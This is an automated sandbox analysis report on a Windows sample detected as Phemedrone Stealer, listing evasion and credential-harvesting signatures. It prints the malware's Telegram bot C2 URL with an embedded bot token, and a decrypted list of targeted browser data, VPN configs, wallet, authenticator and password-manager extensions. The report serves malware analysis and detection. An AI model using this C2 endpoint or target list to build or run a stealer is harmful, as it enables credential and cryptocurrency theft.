Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Activation.exe

Overview

General Information

Sample name:Activation.exe
Analysis ID:1568338
MD5:aa3a94ba72728df41a815b060f5e9c52
SHA1:baec525e25786a3787b90b300a383f814e65377d
SHA256:573a6686dba8217e51b0c4fd9b041a4bf3ce193d6be69e201a6edcefa3dc42e6
Tags:45-200-148-86exeuser-JAMESWT_MHT
Infos:

Detection

Phemedrone Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Generic Stealer
Yara detected Phemedrone Stealer
Yara detected Telegram RAT
AI detected suspicious sample
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Uses the Telegram API (likely for C&C communication)
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains long sleeps (>= 3 min)
Detected potential crypto function
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains sections with non-standard names
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • Activation.exe (PID: 7588 cmdline: "C:\Users\user\Desktop\Activation.exe" MD5: AA3A94BA72728DF41A815B060F5E9C52)
    • WerFault.exe (PID: 8060 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7588 -s 2432 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
{"C2 url": "https://api.telegram.org/bot7772275304:AAF3OSvWBzn5cIHkGD9ueBFz5ed91u-60-U/sendMessage"}
SourceRuleDescriptionAuthorStrings
00000000.00000002.1654044812.0000000003607000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_PhemedroneStealerYara detected Phemedrone StealerJoe Security
    00000000.00000002.1654044812.00000000034E0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_PhemedroneStealerYara detected Phemedrone StealerJoe Security
      00000000.00000002.1654044812.00000000034E0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GenericStealer_9Yara detected Generic StealerJoe Security
        00000000.00000002.1654044812.00000000034D2000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_PhemedroneStealerYara detected Phemedrone StealerJoe Security
          00000000.00000002.1654044812.00000000034D2000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GenericStealer_9Yara detected Generic StealerJoe Security
            Click to see the 14 entries
            No Sigma rule has matched
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-04T15:12:01.549797+010028438561A Network Trojan was detected192.168.2.949746149.154.167.220443TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: Activation.exe.7588.0.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7772275304:AAF3OSvWBzn5cIHkGD9ueBFz5ed91u-60-U/sendMessage"}
            Source: Activation.exeReversingLabs: Detection: 42%
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Source: Activation.exeJoe Sandbox ML: detected
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: OpenVPN
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: OpenVPN Connect
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: profiles
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: ovpn
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: VPN/OpenVpn/
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: ProtonVPN
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: ProtonVPN_
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: user.config
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: VPN/ProtonVPN/
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: \
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: SurfShark
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Surfshark
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: *.dat
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: VPN/SurfShark/
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: 7772275304:AAF3OSvWBzn5cIHkGD9ueBFz5ed91u-60-U
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: -4567089584
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor:
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: tr
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Udofoge
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: .txt
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Pekorojasecopycemonuxazivopenos
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Passwords.txt
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor:
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Messengers/Discord/Tokens.txt
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor:
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Google Accounts/Tokens.txt
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Chromium
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: User Data
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: 1.0.0.0
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Local State
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Network
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Cookies
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: cookies
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Web Data
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: autofill
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Login Data
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: logins
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: token_service
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: credit_cards
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Browser Data/
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: /Cookies[
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: ].txt
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor:
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: /AutoFills[
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor:
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Local Storage
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: leveldb
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: CreditCards.txt
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Profile*
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Default
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Authenticator
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: bhghoamapcdpbohphigoooaddinpkbai
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: EOS Authenticator
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: oeljdldpnmdbchonielidgobddffflal
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: BrowserPass
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: naepdomgkenhinolocfifgehidddafch
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: MYKI
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: bmikpgodpkclnkgmnpphehdgcimmided
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Splikity
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: jhfjfclepacoldmjmkmdlmganfaalklb
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: CommonKey
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: chgfefjpcobfbnpmiokfjjaglahmnded
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Zoho Vault
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: igkpcodhieompeloncfnbekccinhapdb
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Norton Password Manager
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: admmjipmmciaobhojoghlmleefbicajg
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Avira Password Manager
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: caljgklbbfbcjjanaijlacgncafpegll
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Trezor Password Manager
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: imloifkgjagghnncjkhggdhalmcnfklk
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: MetaMask
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: nkbihfbeogaeaoehlefnkodbefgpgknn
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: TronLink
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: ibnejdfjmmkpcnlpebklmnkoeoihofec
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: BinanceChain
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: fhbohimaelbohpjbbldcngcnapndodjp
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Coin98
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: aeachknmefphepccionboohckonoeemg
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: iWallet
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: kncchdigobghenbbaddojjnnaogfppfj
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Wombat
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: amkmjjmmflddogmhpjloimipbofnfjih
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: NeoLine
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: cphhlgmgameodnhkjdmkpanlelnlohao
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Terra Station
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: aiifbnbfobpmeekipheeijimdpnlpgpp
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Keplr
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: dmkamcknogkgcdfhhbddcghachkejeap
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Sollet
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: fhmfendgdocmcbmfikdcogofphimnkno
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: ICONex
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: flpiciilemghbmfalicajoolhkkenfel
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: KHC
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: hcflpincpppdclinealmandijcmnkbgn
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: TezBox
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: mnfifefkajgofkcjkemidiaecocnkjeh
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Byone
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: nlgbhdfgdhgbiamfdfmbikcdghidoadd
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: OneKey
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: ilbbpajmiplgpehdikmejfemfklpkmke
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Trust Wallets
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: pknlccmneadmjbkollckpblgaaabameg
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: MetaWallet
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: pfknkoocfefiocadajpngdknmkjgakdg
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Guarda Wallet
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: fcglfhcjfpkgdppjbglknafgfffkelnm
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Exodus
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: idkppnahnmmggbmfkjhiakkbkdpnmnon
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: JaxxxLiberty
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: mhonjhhcgphdphdjcdoeodfdliikapmj
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Atomic Wallet
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: bhmlbgebokamljgnceonbncdofmmkedg
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Electrum
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: hieplnfojfccegoloniefimmbfjdgcgp
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Mycelium
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: pidhddgciaponoajdngciiemcflpnnbg
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Coinomi
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: blbpgcogcoohhngdjafgpoagcilicpjh
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: GreenAddress
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: gflpckpfdgcagnbdfafmibcmkadnlhpj
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Edge
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: doljkehcfhidippihgakcihcmnknlphh
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: BRD
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: nbokbjkelpmlgflobbohapifnnenbjlh
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Samourai Wallet
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: apjdnokplgcjkejimjdfjnhmjlbpgkdi
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Copay
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: ieedgmmkpkbiblijbbldefkomatsuahh
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Bread
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: jifanbgejlbcmhbbdbnfbfnlmbomjedj
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: KeepKey
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: dojmlmceifkfgkgeejemfciibjehhdcl
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Trezor
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: jpxupxjxheguvfyhfhahqvxvyqthiryh
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Ledger Live
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: pfkcfdjnlfjcmkjnhcbfhfkkoflnhjln
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Ledger Wallet
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: hbpfjlflhnmkddbjdchbbifhllgmmhnm
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Bitbox
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: ocmfilhakdbncmojmlbagpkjfbmeinbd
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Digital Bitbox
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: dbhklojmlkgmpihhdooibnmidfpeaing
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: YubiKey
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: mammpjaaoinfelloncbbpomjcihbkmmc
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Google Authenticator
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: khcodhlfkpmhibicdjjblnkgimdepgnd
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Microsoft Authenticator
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: bfbdnbpibgndpjfhonkflpkijfapmomn
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Authy
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: gjffdbjndmcafeoehgdldobgjmlepcal
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Duo Mobile
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: eidlicjlkaiefdbgmdepmmicpbggmhoj
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: OTP Auth
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: bobfejfdlhnabgglompioclndjejolch
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: FreeOTP
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: elokfmmmjbadpgdjmgglocapdckdcpkn
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Aegis Authenticator
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: ppdjlkfkedmidmclhakfncpfdmdgmjpm
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: LastPass Authenticator
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: cfoajccjibkjhbdjnpkbananbejpkkjb
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Dashlane
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: flikjlpgnpcjdienoojmgliechmmheek
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Keeper
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: gofhklgdnbnpcdigdgkgfobhhghjmmkj
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: RoboForm
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: hppmchachflomkejbhofobganapojjol
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: KeePass
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: lbfeahdfdkibininjgejjgpdafeopflb
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: KeePassXC
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: kgeohlebpjgcfiidfhhdlnnkhefajmca
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Bitwarden
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: inljaljiffkdgmlndjkdiepghpolcpki
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: NordPass
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: njgnlkhcjgmjfnfahdmfkalpjcneebpl
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: LastPass
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: gabedfkgnbglfbnplfpjddgfnbibkmbb
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Nifty Wallet
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: jbdaocneiiinmjbjlgalhcelgbejmnid
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Math Wallet
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: afbcbjpbpfadlkmhmclhkeeodmamcflc
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Coinbase Wallet
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: hnfanknocfeofbddgcijnmhnfnkdnaad
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Equal Wallet
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: blnieiiffboillknjnepogjhkgnoac
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: EVER Wallet
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: cgeeodpfagjceefieflmdfphplkenlfk
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Jaxx Liberty
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: ocefimbphcgjaahbclemolcmkeanoagc
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: BitApp Wallet
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: fihkakfobkmkjojpchpfgcmhfjnmnfpi
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Mew CX
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: nlbmnnijcnlegkjjpcfjclmcfggfefdm
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: GU Wallet
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: nfinomegcaccbhchhgflladpfbajihdf
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Guild Wallet
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: nanjmdkhkinifnkgdeggcnhdaammmj
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Saturn Wallet
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: nkddgncdjgifcddamgcmfnlhccnimig
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Harmony Wallet
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: fnnegphlobjdpkhecapkijjdkgcjhkib
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: TON Wallet
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: nphplpgoakhhjchkkhmiggakijnkhfnd
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: OpenMask Wallet
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: penjlddjkjgpnkllboccdgccekpkcbin
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: MyTonWallet
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: fldfpgipfncgndfolcbkdeeknbbbnhcc
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: DeWallet
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: pnccjgokhbnggghddhahcnaopgeipafg
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: TrustWallet
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: egjidjbpglichdcondbcbdnbeeppgdph
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: NC Wallet
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: imlcamfeniaidioeflifonfjeeppblda
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Moso Wallet
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: ajkifnllfhikkjbjopkhmjoieikeihjb
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Enkrypt Wallet
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: kkpllkodjeloidieedojogacfhpaihoh
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: CirusWeb3 Wallet
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: kgdijkcfiglijhaglibaidbipiejjfdp
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Martian and Sui Wallet
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: efbglgofoippbgcjepnhiblaibcnclgk
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: SubWallet
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: onhogfjeacnfoofkfgppdlbmlmnplgbn
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Pontem Wallet
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: phkbamefinggmakgklpkljjmgibohnba
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Talisman Wallet
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: fijngjgcjhjmmpcmkeiomlglpeiijkld
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Kardiachain Wallet
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: pdadjkfkgcafgbceimcpbkalnfnepbnk
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Phantom Wallet
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: bfnaelmomeimhIpmgjnjophhpkkoljpa
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Oxygen Wallet
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: fhilaheimglignddjgofkcbgekhenbh
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: PaliWallet
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: mgfffbidihjpoaomajlbgchddlicgpn
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: BoltX Wallet
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: aodkkagnadcbobfpggnjeongemjbjca
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Liquality Wallet
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: kpopkelmapcoipemfendmdghnegimn
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: xDefi Wallet
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: hmeobnffcmdkdcmlb1gagmfpfboieaf
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Nami Wallet
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Ipfcbjknijpeeillifnkikgncikgfhdo
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: MaiarDeFi Wallet
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: dngmlblcodfobpdpecaadgfbeggfjfnm
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: MetaMask Edge Wallet
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: ejbalbakoplchlghecdalmeeeajnimhm
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Goblin Wallet
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: mlbafbjadjidk1bhgopoamemfibcpdfi
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Braavos Smart Wallet
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: jnlgamecbpmbajjfhmmmlhejkemejdma
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: UniSat Wallet
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: ppbibelpcjmhbdihakflkdcoccbgbkpo
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: OKX Wallet
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: mcohilncbfahbmgdjkbpemcciiolgcge
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Manta Wallet
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: enabgbdfcbaehmbigakijjabdpdnimlg
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Suku Wallet
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: fopmedgnkfpebgllppeddmmochcookhc
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Suiet Wallet
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: khpkpbbcccdmmclmpigdgddabeilkdpd
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Koala Wallet
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: lnnnmfcpbkafcpgdilckhmhbkkbpkmid
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: ExodusWeb3 Wallet
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: aholpfdialjgjfhomihkjbmgjidlcdno
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Aurox Wallet
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: kilnpioakcdndlodeeceffgjdpojajlo
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Fewcha Move Wallet
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: ebfidpplhabeedpnhjnobghokpiioolj
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Carax Demon Wallet
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: mdjmfdffdcmnoblignmgpommbefadffd
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Leap Terra Wallet
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: aijcbedoijmgnlmjeegjaglmepbmpkpi
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Local Extension Settings
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: Extensions/
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: /
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: [
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: ]/
            Source: 0.2.Activation.exe.ce0000.0.unpackString decryptor: PartnerRules
